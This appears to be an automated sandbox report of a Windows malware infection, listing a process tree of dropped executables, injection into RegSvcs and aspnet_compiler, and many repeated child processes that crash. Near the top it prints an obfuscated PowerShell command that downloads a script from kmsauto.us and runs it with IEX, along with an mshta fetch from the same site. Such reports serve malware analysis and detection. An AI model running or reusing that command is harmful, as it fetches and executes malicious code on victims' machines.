- Executes dropped EXE
PID:5700 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt4⤵PID:6076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
- Blocklisted process makes network request
PID:6148 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:8000
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6148 -s 26806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8432
-
-
-
-
-
-
C:\Users\Admin\Documents\NkxB2pYtHkSH45YtWxIgEnEI.exe"C:\Users\Admin\Documents\NkxB2pYtHkSH45YtWxIgEnEI.exe"2⤵
- Executes dropped EXE
PID:4712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5108
-
-
-
C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3320 -
C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"3⤵PID:5196
-
-
-
C:\Users\Admin\Documents\RTkOCBhKilxQpTnUe0g7bA4p.exe"C:\Users\Admin\Documents\RTkOCBhKilxQpTnUe0g7bA4p.exe"2⤵
- Executes dropped EXE
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:5544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 3044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"3⤵
- Suspicious use of SetThreadContext
PID:6568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:6388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1524⤵
- Program crash
PID:2264
-
-
-
-
C:\Users\Admin\Documents\ZF2JIxFMOfpfwaF58aLf1Bpz.exe"C:\Users\Admin\Documents\ZF2JIxFMOfpfwaF58aLf1Bpz.exe"2⤵
- Executes dropped EXE
PID:2536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2796
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe"C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2548 -
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:3184
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:5344
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:5716
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:3452
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:1204
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:3400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1644⤵
- Program crash
PID:1540
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:4524
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4356
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6536
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6900
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6416
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6560
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7052
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6576
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3684
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1040
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3600
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2568
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:972
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5936
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5672
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3720
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6204
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5896
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1200
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6308
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6784
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1344
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4704
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1192
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4544
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1884
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7316
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7664
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8028
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7384
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:844
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 284⤵
- Program crash
PID:4964
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8028
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7984
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1128
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7204
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1880
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 284⤵
- Program crash
PID:3188
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6292
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7732
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7592
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3600
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1156
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4760
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5676
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2800
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2152
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6708
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3028
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7104
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7292
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6408
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:4772
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1216
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7640
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:780
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2276
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1716
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7492
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
PID:5428
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7032
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5244
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5500
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7176
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8048
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8352 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8908
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8620
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8916
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7548
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8660
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3756
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2156
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3552
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1236
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7456
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9068
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2840
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5276
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8168
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9276
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9500
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9720 -s 284⤵
- Program crash
PID:10080
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10024
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5872
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9744
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10000
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10028
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4364
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10060
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9296
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9792
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2572
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3564
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9540
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3892
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6240
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8756
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3952
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9300
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1612
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7572
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:832
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8584
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:936
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4208
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10232
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1516
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6072
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5568
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1884
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8216
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9180
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7516
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9760
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10036
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 284⤵
- Program crash
PID:3432
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4972
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7128
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5000
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6732
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7756
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 284⤵
- Program crash
PID:8784
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2284
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9400
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5008
-
-
